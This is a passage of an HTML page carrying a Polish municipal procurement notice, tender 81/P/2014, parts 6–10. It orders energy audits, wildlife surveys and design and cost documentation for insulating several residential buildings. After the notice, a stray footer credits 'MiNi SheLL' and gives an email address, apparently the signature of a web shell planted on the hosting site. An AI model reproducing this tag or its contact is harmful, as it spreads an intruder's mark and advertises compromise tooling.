<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 6: opracowanie dokumentacji projektowo-kosztorysowej dla budynku przy ul. Gdańskiej 37 obejmującej:
- remont ściany frontowej, w tym renowacji i częściowego odtworzenia elementów wystroju architektonicznego i docieplenia ściany od strony podwórza oraz ścian szczytowych z kolorystyką,
- wymianę stolarki okiennej i drzwiowej, w uzgodnieniu z Miejskim Konserwatorem Zabytków
- wymianę obróbek blacharskich znajdujących się na elewacji włącznie z parapetami zewnętrznymi,
- remont schodów wejściowych do budynku
- wykonanie izolacji ścian fundamentowych wraz z opaskami
Zakres  zamówienia  obejmuje : 
1) opracowanie audytu energetycznego określającego zakres, parametry techniczne i ekonomiczne przedsięwzięcia termomodernizacyjnego, ze wskazaniem rozwiązania optymalnego z punktu widzenia kosztów realizacji przedsięwzięcia
2)  opracowanie ekspertyzy ornitologicznej
3)  opracowanie ekspertyzy chiropterologicznej
4) uzyskanie i skompletowanie przez Wykonawcę we własnym zakresie w ramach oferowanego wynagrodzenia - wszelkich niezbędnych opinii, uzgodnień, map geodezyjnych (w tym uzgodnienie koncepcji z Miejskim Konserwatorem Zabytków oraz uzyskanie opinii MKZ i Plastyka Miasta) - potrzebnych do uzyskania przez Zamawiającego decyzji pozwolenia na realizację robót.
5) wykonanie dokumentacji (projektu budowlanego) zgodnie z zaleceniami audytu energetycznego, ekspertyzy ornitologicznej i chiropterologicznej, uwzględniające wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi,             w tym: wystąpienie w imieniu Zamawiającego do właścicieli sąsiednich działek o zgodę na trwałe zajęcie terenu pod docieplenie oraz częściowe zajęcie terenu na czas przeprowadzenia robót budowlanych  (rozstawienie rusztowania na terenie prywatnych posesji na czas prowadzenia robót) - w przypadku takiej konieczności.
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP             i p. poż. 
b)  dokumentacja kosztorysowa  winna zawierać: 
- kosztorys inwestorski:  wersja papierowa - 3 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., kosztorys należy podzielić na części:  remont ściany frontowej, docieplenie ściany od strony podwórza,  docieplenie ścian szczytowych, wymiana stolarki otworowej, wymiana obróbek blacharskich, remont  schodów wejściowych, wykonanie izolacji ścian fundamentowych z opaskami.
- przedmiar robót (wersja papierowa: 3 egz., na nośniku elektronicznym: płyta CD/DVD, 1 egz.,  z podziałem na części - jak kosztorys inwestorski)
c) specyfikacja techniczna wykonania i odbioru robót winna być sporządzona w wersji papierowej -    3 egzemplarze oraz  zapisana na nośniku elektronicznym -  płyta  CD/DVD, 1 egz.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> 81/P/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 7: opracowanie dokumentacji projektowo-kosztorysowej na docieplenie przegród budowlanych parterowych budynków mieszkalnych przy ul. Żeglarskiej 69 I  i Żeglarskiej 69 II.
Zakres  zamówienia  obejmuje : 
1) opracowanie audytu energetycznego określającego zakres, parametry techniczne i ekonomiczne przedsięwzięcia inwestycyjnego, ze wskazaniem rozwiązania optymalnego z punktu widzenia kosztów realizacji przedsięwzięcia
2)  opracowanie ekspertyzy ornitologicznej
3)  opracowanie ekspertyzy chiropterologicznej
4) uzyskanie i skompletowanie przez Wykonawcę we własnym zakresie w ramach oferowanego wynagrodzenia - wszelkich niezbędnych opinii, uzgodnień, map geodezyjnych - potrzebnych do uzyskania przez Zamawiającego decyzji pozwolenia na realizację robót. 
5) wykonanie dokumentacji (projektu budowlanego) zgodnie z zaleceniami audytu energetycznego, ekspertyzy ornitologicznej i chiropterologicznej, uwzględniające wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi,             w tym: wystąpienie w imieniu Zamawiającego do właścicieli sąsiednich działek o zgodę na trwałe zajęcie terenu pod docieplenie oraz częściowe zajęcie terenu na czas przeprowadzenia robót budowlanych  (rozstawienie rusztowania na terenie prywatnych posesji na czas prowadzenia robót) - w przypadku takiej konieczności.
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP             i p. poż. 
b)  dokumentacja kosztorysowa  winna zawierać: 
- kosztorys inwestorski:  wersja papierowa - 3 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz.,
kosztorys należy podzielić na części:  docieplenie budynku Żeglarska 69 I  oraz  docieplenie budynku               Żeglarska 69 II. 
- przedmiar robót (wersja papierowa: 3 egz., na nośniku elektronicznym: płyta CD/DVD, 1 egz.,  z podziałem na części - jak kosztorys inwestorski)
c) specyfikacja techniczna wykonania i odbioru robót winna być sporządzona w wersji papierowej -  3 egzemplarze oraz  zapisana na nośniku elektronicznym -  płyta  CD/DVD, 1 egz.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> 81/P/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 8:  opracowanie dokumentacji projektowo-kosztorysowej na docieplenie dla budynku oficyny mieszkalnej  przy ul.  Piotra Skargi 10 ,  obejmującej:
- docieplenie ściany od strony podwórka
- docieplenie ścian szczytowych
- docieplenie części elewacji tylnej od strony ulicy Piotra Skargi 8
- remont galerii
- wykonanie izolacji pionowej fundamentów 
Zakres  zamówienia  obejmuje : 
1) opracowanie audytu energetycznego określającego zakres, parametry techniczne i ekonomiczne przedsięwzięcia termomodernizacyjnego, ze wskazaniem rozwiązania optymalnego z punktu widzenia kosztów realizacji przedsięwzięcia
2)  opracowanie ekspertyzy ornitologicznej
3)  opracowanie ekspertyzy chiropterologicznej
4) uzyskanie i skompletowanie przez Wykonawcę we własnym zakresie w ramach oferowanego wynagrodzenia - wszelkich niezbędnych opinii, uzgodnień, map geodezyjnych (w tym uzgodnienie koncepcji z Miejskim Konserwatorem Zabytków oraz uzyskanie opinii MKZ i Plastyka Miasta) - potrzebnych do uzyskania przez Zamawiającego decyzji pozwolenia na realizację robót. 
5) wykonanie dokumentacji (projektu budowlanego) zgodnie z zaleceniami audytu energetycznego, ekspertyzy ornitologicznej i chiropterologicznej, uwzględniające wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi,             w tym: wystąpienie w imieniu Zamawiającego do właścicieli sąsiednich działek o zgodę na trwałe zajęcie terenu pod docieplenie oraz częściowe zajęcie terenu na czas przeprowadzenia robót budowlanych  (rozstawienie rusztowania na terenie prywatnych posesji na czas prowadzenia robót) - w przypadku takiej konieczności.
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP             i p. poż. 
b)  dokumentacja kosztorysowa  winna zawierać: 
- kosztorys inwestorski:  wersja papierowa - 3 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., kosztorys należy podzielić na części:  docieplenie  ściany od strony podwórka, docieplenie ścian szczytowych, docieplenie części elewacji tylnej, remont galerii, wykonanie izolacji pionowej fundamentów
- przedmiar robót (wersja papierowa: 3 egz., na nośniku elektronicznym: płyta CD/DVD, 1 egz.,               z podziałem na części - jak kosztorys inwestorski)
c) specyfikacja techniczna wykonania i odbioru robót winna być sporządzona w wersji papierowej -                3 egzemplarze oraz  zapisana na nośniku elektronicznym -  płyta  CD/DVD, 1 egz.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> 81/P/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 9: opracowanie dokumentacji projektowo-kosztorysowej na docieplenie ściany od strony podwórka oraz ścian szczytowych budynku przy ul. Grunwaldzkiej 49 (front), z uwzględnieniem takiego sposobu wykonania izolacji termicznej ściany szczytowej graniczącej z nieruchomością przy ul. Grunwaldzkiej 47, aby nie zachodziła konieczność najmu terenu pod wykonanie docieplenia (właściciele nie wyrażają zgody na powyższe).
Zakres  zamówienia  obejmuje : 
1) opracowanie audytu energetycznego określającego zakres, parametry techniczne i ekonomiczne przedsięwzięcia termomodernizacyjnego, ze wskazaniem rozwiązania optymalnego z punktu widzenia kosztów realizacji przedsięwzięcia
2)  opracowanie ekspertyzy ornitologicznej
3)  opracowanie ekspertyzy chiropterologicznej
4) uzyskanie i skompletowanie przez Wykonawcę we własnym zakresie w ramach oferowanego wynagrodzenia - wszelkich niezbędnych opinii, uzgodnień, map geodezyjnych (w tym uzgodnienie koncepcji z Miejskim Konserwatorem Zabytków oraz uzyskanie opinii MKZ i Plastyka Miasta) - potrzebnych do uzyskania przez Zamawiającego decyzji pozwolenia na realizację robót. 
5) wykonanie dokumentacji (projektu budowlanego) zgodnie z zaleceniami audytu energetycznego, ekspertyzy ornitologicznej i chiropterologicznej, uwzględniające wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi,             
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP             i p. poż. 
b)  dokumentacja kosztorysowa  winna zawierać: 
- kosztorys inwestorski:  wersja papierowa - 3 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., kosztorys należy podzielić na części:  docieplenie  ściany od strony podwórka, docieplenie ścian                   szczytowych
- przedmiar robót (wersja papierowa: 3 egz., na nośniku elektronicznym: płyta CD/DVD, 1 egz. z podziałem na części - jak kosztorys inwestorski)
c) specyfikacja techniczna wykonania i odbioru robót winna być sporządzona w wersji papierowej -  3 egzemplarze oraz  zapisana na nośniku elektronicznym -  płyta  CD/DVD, 1 egz.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> 81/P/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 10: opracowanie dokumentacji projektowo-kosztorysowej na wykonanie docieplenia ścian zewnętrznych budynku mieszkalnego - oficyny 2 przy ul. Gdańskiej 130  wraz z wymiana drzwi                 wejściowych do budynku i okien strychowych 
Zakres  zamówienia  obejmuje : 
1) opracowanie audytu energetycznego określającego zakres, parametry techniczne i ekonomiczne przedsięwzięcia termomodernizacyjnego, ze wskazaniem rozwiązania optymalnego z punktu widzenia kosztów realizacji przedsięwzięcia
2)  opracowanie ekspertyzy ornitologicznej
3)  opracowanie ekspertyzy chiropterologicznej
4) uzyskanie i skompletowanie przez Wykonawcę we własnym zakresie w ramach oferowanego wynagrodzenia - wszelkich niezbędnych opinii, uzgodnień, map geodezyjnych (w tym uzgodnienie koncepcji z Miejskim Konserwatorem Zabytków oraz uzyskanie opinii MKZ i Plastyka Miasta) - potrzebnych do uzyskania przez Zamawiającego decyzji pozwolenia na realizację robót. 
5) wykonanie dokumentacji (projektu budowlanego) zgodnie z zaleceniami audytu energetycznego, ekspertyzy ornitologicznej i chiropterologicznej, uwzględniające wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi,             w tym: wystąpienie w imieniu Zamawiającego do właścicieli sąsiednich działek o zgodę na trwałe zajęcie terenu pod docieplenie oraz częściowe zajęcie terenu na czas przeprowadzenia robót budowlanych  (rozstawienie rusztowania na terenie prywatnych posesji na czas prowadzenia robót) - w przypadku takiej konieczności.             
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP             i p. poż. 
b)  dokumentacja kosztorysowa  winna zawierać: 
-  kosztorys inwestorski:  wersja papierowa - 3 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., kosztorys należy podzielić na części:  docieplenie ścian budynku, wymiana drzwi wejściowych, wymiana okienek strychowych. 
- przedmiar robót (wersja papierowa: 3 egz., na nośniku elektronicznym: płyta CD/DVD, 1 egz.  z podziałem na części - jak kosztorys inwestorski)
c) specyfikacja techniczna wykonania i odbioru robót winna być sporządzona w wersji papierowej -  3 egzemplarze oraz  zapisana na nośniku elektronicznym -  płyta  CD/DVD, 1 egz.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com